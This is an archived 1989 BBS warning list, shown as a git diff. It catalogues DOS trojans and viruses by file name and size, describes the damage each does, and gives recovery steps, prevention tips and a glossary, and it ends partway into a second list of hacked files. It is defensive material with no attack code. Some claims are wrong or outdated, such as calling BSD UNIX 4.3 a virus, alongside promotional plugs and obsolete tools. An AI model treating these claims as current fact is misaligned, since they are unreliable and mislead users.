+TITLE DEFINITIONS:
+
+ TROJAN                  These programs PURPOSEFULLY damage a
+                         user's system upon their invocation. 
+                         They usually aim to disable [Hard] disks,
+                         although they can destroy other
+                         equipment, too.
+
+ VIRUS                   These programs are the ultimate TROJAN
+                         designed to infect as well as destroy
+                         the User's and other systems that it
+                         infects. Its sole purpose is to
+                         replicate itself while destroying the
+                         system. This term will be used in
+                         conjunction with those files that are
+                         infected as well as those files that
+                         start the virus.
+
+ CAREFUL                 Programs labeled in this manner may
+                         may not be trojans; the question is
+                         how it's used. Use caution when running
+                         these programs!
+
+ *                       The asterisks will be used to show that
+                         the file may or may not be "BAD" or
+                         unresolved.
+
+
+NOTE:  If a file extension is not supplied, that means that the
+file circulates under many different extensions.  For instance,
+users commonly upload with extensions of .ARC, .PAK, .LZH, .SDN,
+.ZOO, .ZIP, or as .EXE or .COM files.
+
+ -----------------------------------------------------------------
+ |                   TROJAN HORSE PROGRAMS:                      |
+ -----------------------------------------------------------------
+
+NAME             CATEGORY  NOTES
+--------------   --------  ---------------------------------------
+
+3X3SHR           *TROJAN   Time Bomb type trojan wipes the [Hard]
+                           Drive clean. File size is 78,848.
+
+ANTI-PCB         *TROJAN   The story behind this trojan horse is
+                           sickening. Apparently one RBBS-PC
+                           sysop and one PC-BOARD sysop started
+                           feuding about which BBS system was 
+                           better, and in the end the PC-BOARD
+                           sysop wrote a trojan and uploaded it to
+                           the rbbs SysOp under ANTI-PCB.COM. Of
+                           course the RBBS-PC SysOp ran it, and
+                           that led to quite a few accusations and
+                           a big mess in general. Let's grow up!
+                           Every SysOp has the right to run the
+                           type of BBS they please, and the fact
+                           that a SysOp actually wrote a trojan
+                           ntended for another sysop simply
+                           blows my mind.
+
+ARC2ZIP.EXE         VIRUS  This Lehigh Virus strain that attacks
+                           the COMMAND.COM and is used in 
+                           converting ARCed files to ZIPed files.
+                           This file also copies itself into the
+                           ZIPed file while remaining a TSR within
+                           COMMAND.COM. Also it is always looking
+                           for COMMAND.COM on a FLOPPY diskette, so
+                           it has two ways to infect.
+
+ARC513.EXE       *TROJAN   This hacked version of ARC appears
+                           normal, so beware!  It will write over
+                           track 0 of your [hard] disk upon usage,
+                           destroying the disk.
+
+ARC514.COM       *TROJAN   This is very similar to ARC version
+                           5.13 in that it will overwrite track 0
+                           (FAT Table) of your [Hard] disk. Also, I
+                           have yet to see an .EXE version of this
+                           program.
+
+ARC533.EXE         VIRUS   This is a new Virus program designed to
+                           emulate Sea's ARC program. It infects
+                           OMMAND.COM. Lehigh Virus Type.
+
+BACKTALK         *TROJAN   This program used to be a good PD
+                           utility, but someone changed it to be
+                           trojan. Now this program will write/
+                           destroy sectors on your [hard] disk
+                           drive. Use this with caution if you
+                           acquire it, because it's more than
+                           likely that you got a bad copy.
+
+B30012A.ARC      *TROJAN   Was supposed to be a Quick BBS utilty
+                           to handle 300 baud Users. But what it
+                           really does is delete many of the
+                           general directories used by a Quick
+                           BBS system.
+
+CDIR.COM         *TROJAN   This program is supposed to give you a
+                           color directory of files on your disk,
+                           but it in fact will scramble your disk's
+                           File Allocation Table (FAT).
+
+D-XREF60.COM      TROJAN   A Pascal Utility used for Cross-
+                           Referencing, written by the infamous
+                           Dorn Stickel. It eats the FAT and
+                           BOOT sector after a time period has
+                           been met and if the [Hard] Drive is more
+                           than half full.
+
+DANCERS.BAS      *TROJAN   This trojan shows some animated dancers
+                           in color, and then proceeds to wipe out
+                           your [hard] disk's FAT table.  There is
+                           another perfectly good copy of DANCERS.
+                           BAS on BBS's around the country; appar-
+                           ently the idiot trojan author altered a
+                           legitimate program to do the dirty work.
+
+DISKSCAN.EXE      TROJAN   This was a PC-MAGAZINE program to scan
+                           a [hard] disk for bad sectors, but then
+                           a joker edited it to WRITE bad sectors 
+                           Also look for this under other names
+                           such as SCANBAD.EXE and BADDISK.EXE. A
+                           good original copy is availble on SCP
+                           Business BBS.
+
+DMASTER          *TROJAN   This is yet another FAT scrambler.
+
+DOSKNOWS.EXE     *TROJAN   I'm still tracking this one down --
+                           apparently someone wrote a FAT killer
+                           and renamed it DOSKNOWS.EXE, so it
+                           would be confused with the real,
+                           harmless DOSKNOWS system-status
+                           utility.  All I know for sure is that
+                           the REAL DOSKNOWS.EXE is 5376 bytes
+                           long.  If you see something called
+                           DOSKNOWS that isn't close to that size,
+                           sound the alarm.
+
+DOS-HELP          TROJAN   This trojan, when made memory-resident,
+                           is supposed to display a DOS command
+                           that the User needs help with. Works fine
+                           on a Diskette system, but on a [Hard]
+                           DRIVE system, it tries to format the
+                           [Hard] Disk with every access of
+                           DOS-HELP.
+
+DPROTECT         *TROJAN   Apparently someone tampered with the
+                           original, legitimate version of
+                           DPROTECT and turned it into a FAT
+                           eater. A good version is available
+                           on SCP Business BBS.
+
+DRAIN2           *TROJAN   There really is a DRAIN program, but
+                           this revised program goes out does a Low
+                           Level Format while it is playing the 
+                           funny program.
+
+DROID.EXE        *TROJAN   This trojan appears under the guise of
+                           a game. You are supposedly an architect
+                           who controls futuristic droids in search
+                           of relics. In fact, PC-Board sysops (if
+                           they run this program from C:\PCBOARD) 
+                           will find that it copies C:\PCBOARD\
+                           PCBOARD.DAT to C:\PCBOARD\HELP\HLPX. The 
+                           .EXE file is 54,272 bytes.
+
+DRPTR.ARC         TROJAN   File found on two boards in the 343
+                           Net.  After running unsuspected file,
+                           the only things left in the Sysop's
+                           root directory were the subdirectories
+                           and two of the three DOS System files,
+                           along with a 0-byte file named
+                           WIPEOUT.YUK. The Sysop's COMMAND.COM
+                           was located in a different directory;
+                           the file date and CRC had not changed.
+
+DSZ (Patch)     *CAREFUL   The author of this protocol program,
+                           Chuck Forsberg, warns that anyone using
+                           an Unregistered version of DSZ that was
+                           HACKED with a downloaded PATCH to make
+                           it work fully, might get a SCRAMBLED FAT.
+                           Seems someone created the HACK PATCH and
+                           then uploaded it to BBS's. *BEWARE* of
+                           the PATCH! It is not the DSZ program that
+                           does the dirty work, but the invalid PATCH.
+
+EGABTR           *TROJAN   BEWARE! Description says something like
+                           "improve your EGA display," but when
+                           run, it deletes everything in sight and
+                           prints, "Arf! Arf! Got you!"
+
+EMMCACHE        *CAREFUL   This program is not exactly a trojan,
+                           but it (v. 1.0) may have the capability
+                           of destroying [Hard] disks by:
+                           A) Scrambling every file modified after
+                           running the program.
+                           B) Destroying boot sectors.
+                           This program has damaged at least two
+                           [Hard] disks; yet there is a base of
+                           happily registered users. Therefore, 
+                           extreme caution is advised if you decide
+                           to use this program.
+
+FILER.EXE        *TROJAN   One SysOp complained a while ago that
+                           this program wiped out his 20 Megabyte
+                           [Hard] disk. I'm not so sure that he was
+                           correct and/or telling the truth any
+                           more. I have personally tested an
+                           excellent file manager also named
+                           FILER.EXE, and it worked perfectly. 
+                           Also, many other SysOp's have written
+                           to tell me that they have like me used
+                           a FILER.EXE with no problems. If you
+                           get a program named FILER.EXE, it is
+                           probably alright, but better to test it
+                           first using some security measures.
+
+FILES.GBS        CAREFUL   When an OPUS BBS system is installed
+                           improperly, this file could spell
+                           disaster for the Sysop.  It can let a
+                           user of any level into the system.
+                           Protect yourself. Best to have a
+                           sub-directory in each upload area
+                           called c:\upload\files.gbs (this is an
+                           example only). This would force Opus to
+                           rename a file upload of files.gbs and
+                           prevent its usage.
+
+FINANCE4.ARC    *CAREFUL   This program is not a verified trojan;
+                           there is simply a file going around
+                           BBS's warning that it may be a trojan. 
+                           In any case, exercise extreme care with
+                           it.
+
+FLU4TXT.COM       TROJAN   Man, when I thought we had it licked!
+                           This Trojan was inserted into the
+                           FluShot4.ARC and uploaded to many
+                           BBS's. FluShot is a protector of your
+                           COMMAND.COM. The author of FluShot
+                           posted this Trojan warning, and I am
+                           posting it here in the GL. If you need
+                           a good copy, you can get it from here--
+                           SCP Business BBS--or on COMPUSERVE.
+
+FOX2.ARC          TROJAN   The show program was put into the FOX
+(SHOW.COM)                 archive to display a porono on VGA.
+                           While doing so it corrupts the FAT of
+                           the HD. Even NU can not recover it. A
+                           FAT recover program like MIRROR has
+                           not yet been tested for it.
+                           Name     Size  Date
+                           Show.com 14562 06/02/85
+
+FUTURE.BAS       *TROJAN   This "program" starts out with a very
+                           nice color picture (of what, I don't
+                           know) and then proceeds to tell you
+                           that you should be using your computer
+                           for better things than games and
+                           graphics. After making that point, it
+                           trashes your A: drive, and B:, C:, D: 
+                           drives until it has erased all drives.
+                           It does not go after the FAT alone; it
+                           also erases all of your data. As far
+                           as I know, however, it erases only one
+                           sub-directory tree level deep, thus
+                           [Hard] disk users should only be
+                           seriously affected if they are in the
+                           "root" directory. I'm not sure about
+                           this one either, though.
+
+GATEWAY2         *TROJAN   Someone tampered with version 2.0 of
+                           the CTTY monitor GATEWAY.  What it
+                           does is ruin the FAT. If you need a
+                           good copy, you can file-request it or
+                           pick one up from 105/301--SCP Business
+                           BBS.
+
+GRABBER           TROJAN   This program is supposed to be a SCREEN
+                           CAPTURE program that copies the screen
+                           to a .COM to be run later from the DOS
+                           command line. As a TSR, it will also
+                           attempt to do a DISK WRITE to the [Hard]
+                           drive when you do not want it to. It
+                           will wipe whole Directories when doing
+                           a normal DOS command. One sysop who
+                           ran it lost all of his ROOT directory
+                           including his SYSTEM files. The file
+                           status is :
+                           Name         Size  Date      Time
+                           GRABBER.COM  2583  05/28/87  22:10
+
+GRASPRT.EXE        VIRUS   This file was in a porno file called
+                           SEXSHOE.LZH originating from PC-EXEC 
+                           BBS. The Sysop took it off, but it had
+                           been downloaded by a few people. This is
+                           one of the Jerusalem-B Virus strains.
+                           The status is:
+                           Name         Size   Date      Time
+                           GRASPRT.EXE  73376  06/03/86  09:49
+
+G-MAN             TROJAN   Another FAT killer.
+
+HEART.EXE         VIRUS    Infected with the Israeli Virus.
+                           Displays the HEART logo on CGA monitor
+                           while infecting the HD. File is found
+                           on some SHAREWARE houses watch for it.
+                           Name      Size  Date
+                           HEART.EXE 13744 ?????
+
+JIV40.LZH         VIRUS    Hacked propgram of JIV - current real
+                           program is v3.3 NOT v4.0 - It is also
+                           infected by a Virus which attaches to
+                           any .COM file it can find.
+
+KC-PAL.COM        TROJAN   Infects the COMMAND.COM and then attaches
+                           to any .COM file afterward using the
+                           COMMAND.COM during its use of Internal
+                           commands (COPY, DIR, TYPE, etc.). The
+                           COMMAND.COM files are enlarged in size
+                           by 1538 bytes, and in the Time column
+                           of the directory, listing the seconds
+                           is reset from :00 to :62.
+
+LM                TROJAN   Deletes the COMMAND.COM and other
+                           files from the ROOT directory of the 
+                           [Hard] Drive when the program runs.
+
+MAP               TROJAN   This is another trojan horse written by
+                           the infamous Dorn Stickel. Designed
+                           to display what TSR's are in memory and
+                           works on FAT and BOOT sectors. Also
+                           seems towork only when the [Hard] Drive
+                           is 50 percent full or more.
+
+MATHKIDS.ARC     *TROJAN   This is a fairly benign trojan that
+                           will not reformat your [Hard] disks or
+                           do any system-level damage. Instead,
+                           it is designed to crack a BBS system. It
+                           will attempt to copy the USER file on
+                           a BBS to a file innocently called
+                           FIXIT.ARC, which the originator can
+                           later call in and download. Believed
+                           to be designed for PCBoard BBS's.
+
+MOUSEKEY.COM      VIRUS    Mouse device program infected with the
+                           CASCADE type virus.
+
+NORTSHOT.ZIP      TROJAN   A supposed VIRUS checker - while
+NORTSTOP.ZIP               listing the DIR during its check
+                           displays that the disk is Virus Free -
+                           but during Dec. 24th and Dec. 31st it
+                           will ERASE files in several DIR's
+                           based on their extension. NORTSHOT.ZIP
+                           and NORTSTOP.ZIP are same file.
+                           Name         Size  Date
+                           NORTSTOP.EXE 38907 ?????
+
+NOTROJ.COM       *TROJAN   This "program" is the most sophisti-
+                           cated trojan horse that I've seen to
+                           date. All outward appearances indicate
+                           that the program is a useful utility
+                           used to FIGHT other trojan horses.
+                           Actually, it is a time bomb that erases
+                           any [Hard] disk FAT IT can find and,
+                           at the same time, it warns: "another 
+                           program is attempting a format, can't
+                           abort!  After erasing the FAT(s),
+                           NOTROJ then proceeds to start a low
+                           level format. One extra thing to note:
+                           NOTROJ only damages FULL [Hard] drives;
+                           if a [Hard] disk is under 50 percent 
+                           full, this program won't touch it!
+                           If you are interested in reading a
+                           thorough report on NOTROJ.COM, James H.
+                           Coombes has written an excellent text
+                           file on the matter named NOTROJ.TXT.
+                           If you have trouble finding it, you
+                           can get it from SCP Business BBS.
+
+PACKDIR          *TROJAN   This utility is supposed to "pack"
+                           (sort and optimize) the files on a
+                           [hard] disk, but apparently it
+                           scrambles FATs.
+
+PCW271xx.ARC     *TROJAN   A modified version of the popular
+                           PC-WRITE word processor (v. 2.71) has
+                           now scrambled at least 10 FAT tables
+                           that I know of.  If you want to
+                           download version 2.71 of PC-WRITE, be 
+                           very careful!  The bogus version can be
+                           identified by its size; it uses 98,274
+                           bytes whereas the good version uses
+                           98,644.  For reference, version 2.7 of
+                           PC-WRITE occupies 98,242 bytes.
+
+PKX35B35.ARC }   *TROJAN   This was supposed to be an update to
+PKB35B35.ARC }    *VIRUS   PKARC file compress utility. When it is
+                           run, it *EATS your FATS* and is said to 
+                           to infect other files so it can spread.
+                           Possible VIRUS.
+
+PKPAK/PKUNPAK   *CAREFUL   There is a TAMPERED version of 3.61
+  v3.61                    that interferes with PC's interrupts.
+
+PKFIX361.EXE     *TROJAN   Supposed patch to v3.61. What it really
+                           does when it is extracted from the .EXE 
+                           file is do DIRECT access to the DRIVE
+                           CONTROLLER to perform a Low-Level format,
+                           thereby bypassing checking programs.
+
+PK362.EXE       *CAREFUL   This is a NON-RELEASED version and is
+                           suspected as being a *TROJAN*. Not
+                           verified.
+
+PK363.EXE       *CAREFUL   This is a NON-RELEASED version and is
+                           suspected as being a *TROJAN*. Not
+                           verified.
+
+PKZ100.EXE        TROJAN   Supposed to be a new release of PKZIP,
+                           but what it really does is fill up
+                           your [Hard] drive with many directories
+                           until the system no longer functions. 
+                           The current version is PKZIP v.092.
+
+PKZ120.EXE        TROJAN   Modeifies the AREAS.BBS of BBS's that
+                           use such a file. Replaces addreses in
+                           that file with dummy addreses. then
+                           deletest itself to avoid any way to
+                           desipher how it works.
+                           Name       Size           Date
+                           PKZ120.EXE 172,000approx. 09/13/89
+
+QUIKRBBS.COM     *TROJAN   This Trojan horse advertises that it
+                           will install a program to protect your
+                           RBBS but it does not. It goes and eats
+                           away at the FAT instead.
+
+QUIKREF          *TROJAN   This ARChive contains ARC513.COM.
+                           It is supposed to load RBBS-PC's message
+                           file into memory two times faster than
+                           normal. What it really does is copy the
+                           RBBS-PC.DEF into an ASCII file named
+                           HISCORES.DAT.
+
+RCKVIDEO         *TROJAN   This is another trojan that does what
+                           it's supposed to do, and then wipes out
+                           [Hard] disks.  After showing some simple
+                           animation of a rock star ("Madonna," I
+                           think), the program will go to work on
+                           erasing every file it can lay it's
+                           hands on. After about a minute of this,
+                           it will create three ASCII files that 
+                           say, "You are stupid to download a
+                           video about rock stars," or something
+                           of the like.
+
+SECRET.BAS       *TROJAN   BEWARE!! This may be posted with a note
+                           saying it doesn't seem to work, and
+                           would someone please try it; when you
+                           do, it formats your disks. 
+
+SIDEWAYS.COM     *TROJAN   Be careful with this trojan; there is a
+                           perfectly legitimate version of
+                           SIDEWAYS.EXE circulating. Both the
+                           trojan and the good SIDEWAYS advertise 
+                           that they can print sideways, but
+                           SIDEWAYS.COM will trash a [hard] disk's
+                           boot sector instead. The trojan .COM
+                           file is about 3 KB, whereas the
+                           legitimate .EXE file is about 30 KB
+                           large.
+
+STAR.EXE         *TROJAN   Beware RBBS-PC SysOps! This file puts
+                           some stars on the screen while copying
+                           RBBS-PC.DEF to another name that can be
+                           downloaded later!
+
+STRIPES.EXE      *TROJAN   Similar to STAR.EXE, this one draws an
+                           American flag (nice touch), while it's
+                           busy copying your RBBS-PC.DEF to
+                           another file (STRIPES.BQS) so the joker
+                           can log in later, download STRIPES.BQS, 
+                           and steal all your passwords. Nice, huh?
+
+SUG.COM           TROJAN   This one is supposed to go out and
+                           unprotect copy protected programs disks
+                           by Softguard Systems, Inc.  After it
+                           trashes your disk, it comes back and
+                           displays:
+                           "This destruction constitutes a prima
+                           facie evidence of your violation. If
+                           you attempt to challenge Softguard
+                           Systems Inc..., you will be vigorously
+                           counter-sued for copyright infringement
+                           and theft of services."
+                           AND it by-passes any attempt by CHK4BOMB 
+                           to search for the any hidden messages
+                           that tell you, "YOU BEEN HAD... or 
+                           GOTCHA>>> Ar..Ar..Ar...  It encrypts the
+                           Gotcha message so no Trojan checker can
+                           scan for it.
+
+TIRED            *TROJAN   Another scramble-the-FAT trojan by Dorn
+                           W. Stickel.
+
+TOPDOS           *TROJAN   This is a simple high level [hard] disk
+                           formatter.
+
+TSRMAP           *TROJAN   This program does what it's supposed to
+                           do:  give a map outlining the location
+                           (in RAM) of all TSR programs, but it
+                           also erases the boot sector of drive
+                           "C:".
+
+ULTIMATE.EXE      TROJAN   Another FAT eater.  File status:
+                           Name           Size
+                           ULTIMATE.EXE   3090
+                           ULTIMATE.ARC   2432
+
+UNIX               VIRUS   The UNIX operating system by Berkley,
+                           verson 4.3, is an INTERNET virus. A
+                           Patch is available on SCP Business
+                           BBS. This is the MAIL PACKET VIRUS.
+
+VDIR.COM         *TROJAN   This is a disk killer that Jerry
+                           Pournelle wrote about in BYTE Magazine. 
+                           I have never seen it, although a
+                           responsible friend of mine has.
+
+VGA2CGA.ARC        VIRUS   CGA converter - infected with the
+                           AIDS/Hahaha - has been found on many
+                           USA West Coast BBS's.
+
+VU.EXE            *VIRUS  Infected with the 1704-B Virus. Has not
+                          been confirmed. And is unkown what the
+                          file is supposed to do.
+
+WOW               *VIRUS   Also known as the 1701 Virus. This
+                           is a new strain of the Lehigh Virus
+                           as it not only looks for COMMAND.COM,
+                           but any .COM file. As it does it, the
+                           infected file is enlarged 1,701 bytes
+                           in SIZE. The infection takes as you
+                           run the .COM.  WOW is a TSR. What happens
+                           when you run WOW is that it displays an
+                           advertisement:
+                          	 ""The Wizards of Warez"
+                          	   in assocoation with
+                          	      the copycats
+                          	  the Pirates Unlimited
+                          	          OUTRUN
+                          	 WOW                     1989 "
+                           The virus is also known as WOWTITLE.
+
+
+ -----------------------------------------------------------------
+ |                If you run a trojan horse.....                 |
+ -----------------------------------------------------------------
+
+While reading this, bear in mind that there is no better remedy
+for a drive that has run a trojan horse and been damaged than a
+recent backup.
+
+The first thing to do after running what you think to be a trojan
+horse is to diagnose the damage.  Was your [hard] drive formatted? 
+Did the trojan scramble your FAT table?  Did every file get
+erased?  Did your boot sector on the [hard] drive get erased/
+formatted?  Odds are that the trojan incurred one of these four
+disasters.  After the initial diagnosis, you are ready to remedy
+the problem.
+
+1)   If the trojan low-level formatted your [hard] disk:
+     Hope that you have a recent backup; that's the only sure
+     remedy for this disease.
+
+2)   If the trojan high-level formatted your [hard] disk:  
+     There is only one way out of this mess, and that is to use
+     the MACE+ utilities by Paul Mace.  MACE+ has two devices in
+     it to recover formatted disks, and believe me, they work! I
+     will talk more about the MACE+ utilities later.
+
+3)   If the trojan scrambled your FAT table:
+     Once again, there is nothing to do.  However, there is a
+     program called FATBACK.COM (available on my board named as
+     FATBACK.ZIP) that will back up your FAT table in under a
+     minute to floppy.  Using FATBACK, it is easy and non time-
+     consuming to back up your FAT regularly.
+
+4)   If the trojan erased file(s), and the FAT table is undamaged: 
+     There are many packages to undelete deleted files.  Norton
+     Utilities, PC-Tools, MACE+, and many others will do the
+     job.  I recommend the first three,  they are commercially
+     available at most computer software stores or mail-order
+     stores. Mace Utilities can also be purchased from SOFTEX on
+     CompuServe. When you are undeleting, be sure to undelete files
+     in the order of last time written to disk.
+
+5)   If the boot sector on your [hard] disk gets erased/formatted:
+     There are four things to do if this happens, and the worst
+     that can happen is that you will go without a [hard] disk for
+     a while.  To be on the safest side, back up everything before
+     even proceeding to step "A," although I cannot see why it
+     would be necessary.
+
+     A)   Try doing a "SYS C:" (or "SYS A:") from your original
+          DOS disk, and copy COMMAND.COM back onto the [hard]
+          drive after that.  Try booting, and if that doesn't
+          work, try step B.
+
+     B)   If you have the MACE+ utilities, go to the "other
+          utilities" section and "restore boot sector."  This
+          should do the job if you have been using MACE+
+          correctly. If using PCTOOLS Delux us the MIRROR
+          REBUILD utility function.
+
+     C)   If you are still stuck, BACK UP EVERYTHING and proceed
+          to do a low-level format.  Instructions on how to
+          perform a low-level format should come with your [hard]
+          disk controller card.  Be sure to map out bad sectors
+          using either SCAV.COM by Chris Dunford or by manually
+          entering the locations of bad sectors into the low-level
+          format program.  After the low level format on your hard 
+          disk, run FDISK.COM (it comes with DOS) and create a DOS
+          partition.  Refer to your DOS manual for help in using
+          FDISK.  Then put your original DOS diskette in drive A:
+          and do a FORMAT <drive letter>:/S/V.  Drive letter can
+          stand for "C" or "B" depending on whether you are
+          reformatting a [Hard] disk or not.  Finally you are ready
+          to attempt a reboot.
+
+     D)   If you are still stuck, either employ some professional
+          computer repair person to fix your drive, or live with a
+          non-bootable [hard] drive.
+
+
+A few words of caution on prevention:
+
+1) Get the protection programs from a RELIABLE source.  Always ask
+about any unknown program - virus protection or otherwise - before
+downloading or running it. Know your source! Get it from
+SDNet/Works! FidoNet nodes if they come through SDN.
+
+2) Don't let down your guard!  Most virus protection programs
+intercept specific types of activities (disk writes, for example)
+or specific viruses (such as Apple's VirusRX targeting the Scores
+virus). So USE A VIRAL CHECKER when running new BBS programs. Use
+**  VirusScan! **
+
+3) Make periodic file listings and compare them regularly to prior 
+listings.  Look for unusual changes or unfamiliar files like Hidden 
+or System files.  INVESTIGATE ANYTHING OUT OF THE ORDINARY! Is your 
+system slowing down or failing all the time?
+
+4) BACKUP - BACKUP - BACKUP!  Keep current backups.  I know,  I
+know.  Everyone tells you, even your mom (smile).  At least make
+regular copies of your most important databases and files, and
+most important, KEEP your OLD COPIES around a little longer
+just to be on the safe side.  I have a set devoted strictly to a
+MASTER BACKUP in case my system's current backup is bad.  Then all
+is not lost as I have a MASTER to put me back up.
+
+5) Don't run programs that you got off a BBS on your BOSS's
+machine! Use your own PC first. This could save you the
+embarrassment of facing his ugly mug (smile) and loosing your
+job. Many companies now have policies regarding this.
+
+6) Never run or access a diskette that might contain the SYSTEM
+files. These may be contaminated and could infect your system.
+Know your source! The same goes for the COMMAND.COM.
+
+7) USE WRITE PROTECT TABS! A virus can't infect something it
+can't write to. Use them; they are the cheapest method of
+prevention.
+ 
+       * REMEMBER: The Best Defense is Good * BACKUP *
+
+
+  ---------------------------------------------------------------
+ |                       Update History:                         |
+  ---------------------------------------------------------------
+
+Version 1.0a   The first list of The Guardian compiled from the
+               Dirty Dozen List and from the DIRTY_DOZEN echo
+               conference. The Guardian List will be distributed
+               thru FidoNet and LCRNET. It, unlike the Dirty
+               Dozen List, is comprised of only Trojans and
+               Viruses and is sent out more often than The Dirty
+               Dozen List. Added PK100.EXE, B30012A.ARC.
+
+Version 1.0b   Added plug for SDNet/Works!, and a plug for
+               VirusScan utility. Added GRASPRT.EXE, KC-PAL.COM
+
+Version 1.0c   Added FOX2.ARC(Show.com), HEART.EXE, JIV40.LZH,
+               JIV.COM, MOUSEKEY.COM, NORTSTOP.ZIP/NORTSHOT.ZIP,
+               PKZ120.EXE, VGA2CGA.ARC, VU.EXE - also reworded
+               text file by Sally Nueman.
+
+ -----------------------------------------------------------------
+ |                           Glossary:                           |
+ -----------------------------------------------------------------
+
+
+I have intended this glossary for the beginning to intermediate   
+user; all experienced BBS users will be bored to death with this. 
+
+?Q?            --   (? standing for any character).  File
+                    extension for SQueezed files.  Squeezed files
+                    are unusable until unsqueezed by a utility
+                    such as NUSQ.COM or USQ.COM.  The advantage of
+                    a SQueezed file is that it is smaller than a
+                    regular UnSQueezed file, thus saving disk
+                    space and download time.  ARChives are more
+                    efficient than Squeezed files; that's why
+                    there are so many more ARChives on BBS's these
+                    days.  Example of the extensions of SQueezed
+                    files:  .EQE, .CQM, .LQR, .TQT, .DQC, etc.
+ABBRV          --   Abbreviation for the word: "abbreviation".
+ARC            --   File extension for an ARChive file -- many
+                    files combined together to save space and
+                    download time that require ARC.EXE,
+                    PKXARC.COM, ARCE.COM, or ARCLS.EXE to separate
+                    the files in to runnable and readable (in the
+                    case of text) form.
+BAS            --   Abbrv for "BASIC," as in the programming
+                    language.
+BBS            --   Abbrv for "Bulletin Board System".
+BBS's          --   Abbrv for "Bulletin Board Systems".
+BOARD          --   Also "Bulletin Board System".
+BOGUSWARE      --   Software that is damaging to one or more
+                    parties.
+BOOT or        --   To boot a computer is to restart it from
+ REBOOT             scratch, erasing all TSR programs.  One
+                    reboots by either powering off and then back
+                    on, or pressing ctrl-alt-del at the same time.
+BYTES          --   Bytes measure the length of a file, with one
+                    byte equaling one character in a file.
+CACHE [disk]   --   Area of memory set aside to hold recent data. 
+                    All programs then read recent data from that
+                    memory rather than from disk. 
+CLUSTER        --   A physical block on all [hard] disks
+                    composed of sectors that hold data.
+COM            --   File extension for a file that is executable
+                    from DOS level.
+DD             --   Abbrv for "dirty dozen".
+DOC            --   Abbrv for "documentation".
+EMS            --   Enhanced Memory Specification. An EMS card
+                    holds 2 MB extra memory.
+EXE            --   File extension for a file that is executable
+                    from DOS level.
+FIDONET        --   A network designed and created by Tom
+                    Jennings and his software. A TRADEMARK.
+HACKED         --   A program that has been changed in some way by
+                    another person or program.
+HIGH-LEVEL     --   This type of format is what most computer
+ FORMAT             users view as a regular DOS-format.  That is,
+                    formatting a disk using FORMAT.COM (included
+                    with DOS) is a high-level format.
+IBM            --   Abbrv for International Business Machines
+IBM OR COMP    --   IBM computer or a 99% or greater IBM
+                    Compatible computer.
+KB OR K        --   Abbrv for "KiloBytes."  One Kb equals 1024
+                    bytes.
+LBR            --   Extension on Library files.  Library files are
+                    really many combined files like ARChives, but
+                    they require different utilities to extract
+                    the individual files. Some examples of such
+                    utilities are LUU.EXE, LUE.EXE, LAR.EXE, AND
+                    ZIP.EXE.  See "ARC".
+LOW-LEVEL      --   This type of format is only executed on a
+ FORMAT             [Hard]disk; therefore, most [Hard] disk low-
+                    level format programs come only with a [Hard]
+                    disk controller card.  There are a few PD low-
+                    level formatting packages, though.  Most
+                    manufacturers low level format their [Hard]
+                    drives at the factory.  Low level formatting
+                    is the first step in the three-part formatting
+                    process; the second step is to use FDISK, and
+                    the third is to execute a high-level format.
+MB             --   Abbrv for "Megabytes," or "millions of bytes."
+MISC           --   Abbrv for "miscellaneous".
+OPTIMIZE       --   To make all files on a disk "contiguous," or
+                    physically linked together on a [hard] drive.
+PAK            --   An alternate ARCer used in the BBS community.
+PATCH          --   A file that is patched (combined) into another
+                    file to change the original file in some way.
+PD             --   Abbrv for "Public Domain".
+PIRATED        --   An altered program that normally is sold but
+                    hacked to resemble a PD program.
+RAM            --   Abbrv for "Random Access Memory" (memory
+                    used by software).
+RBBS           --   Abbrv for RBBS-PC, a type of BBS (Remote
+                    Bulletin Board System).
+ROM            --   Abbrv for "Read Only Memory" (memory used by
+                    hardware to boot).
+SDN            --   File extension used by SDNet/Works! to
+                    identify an SDNet/Works! published ShareWare
+                    files. These files are direct from the Author
+                    and are be Virus/Trojan free if obtained from
+                    participating SDNetWorks! BBS.
+SDS            --   System Distribution System. A FidoNet
+                    subsystem that is used to distribute BBS
+                    software, utilities, and newsletters.
+SYSOP          --   Abbrv for SYStem OPerator of a BBS.
+TROJAN         --   Program used to destroy or hamper a computer
+                    in some manner.
+TSR            --   Abbrv for "Terminate and Stay Resident";
+                    Synonym = "Memory Resident".
+TXT            --   Abbrv for "text".
+USU            --   Abbrv for "usually".
+UNP            --   Abbrv for "unprotect".
+UNPROTECT      --   An "unprotect file" is a patch file that
+                    results in the breaking of copy protection (no
+                    doubt for backup purposes).
+UTIL           --   Abbrv for "utility".
+VIRUS/WORM     --   The Ultimate Trojan! Designed to infect the
+                    computer system and to replicate itself to
+                    survive.
+ZIP            --   An alternate ARCer used by the BBS community.
+ZOO            --   All files compressed with ZOO.EXE bear this
+                    file extension.  ZOO-compressed files are NOT
+                    compatible with ARC.EXE.
+
+
+			<< End of file >>
diff --git a/textfiles.com/virus/hackmisc.9 b/textfiles.com/virus/hackmisc.9
new file mode 100644
index 00000000..a839497d
--- /dev/null
+++ b/textfiles.com/virus/hackmisc.9
@@ -0,0 +1,169 @@
+
+------------------------------------------------------------------
+|                  HACKED/MISCELLANEOUS FILES:                   |
+|                                                                |
+|                                    Issue #9: June 9, 1989      |
+|                                                                |
+|   Maintained by Eric Newhouse                                  |
+------------------------------------------------------------------
+|          Hacked        (H) -- See definitions                  |
+|          Miscellaneous (M) -- See definitions                  |
+|                                                                |
+|                             TYPES:                             |
+|                                                                |
+|          Careful       (C) -- Not confirmed, caution advised.  |
+|          Game          (G) -- Recreational software            |
+|          Patch         (P) -- Modification to another program  |
+|                               usually performed through debug. |
+|          Text          (T) -- Text / Documentation File        |
+|          Util          (U) -- Utility of some sort             |
+------------------------------------------------------------------
+
+
+Name          Size Category  Notes
+------------- ------  --  ----------------------------------------
+AUTOMAXX.ARC          HC  This DOS menu-making program comes with
+                         documentation that Marshall Magee, author
+                         of the popular AUTOMENU program, contends
+                         is plagiarized.  Marshall believes that
+                         the AUTOMAXX documentation uses exact
+                         phrases from his documentation, and if
+                         this is the case, AUTOMAXX is clearly
+                         illegal.  However, as I understand it,
+                         the courts are currently deliberating on
+                         the case, so AUTOMAXX is not currently
+                         illegal. of today.  For more information,
+                         please contact Marshall Magee at (404)
+                         446-6611.
+
+CLIPPER.ARC   186803  MU  This is a Norton Guides module for
+CLIP_NG.ARC               the Clipper Dbase Compiler.  Nantucket,
+                          the makers of Clipper, forbid
+                          distribution.
+
+COPYWRIT        2???  MP  Although the real COPYWRITE is going
+                          around Bulletin Boards like fire, there
+                          is another illegal file under the same
+                          name.  The former takes around 40 KB
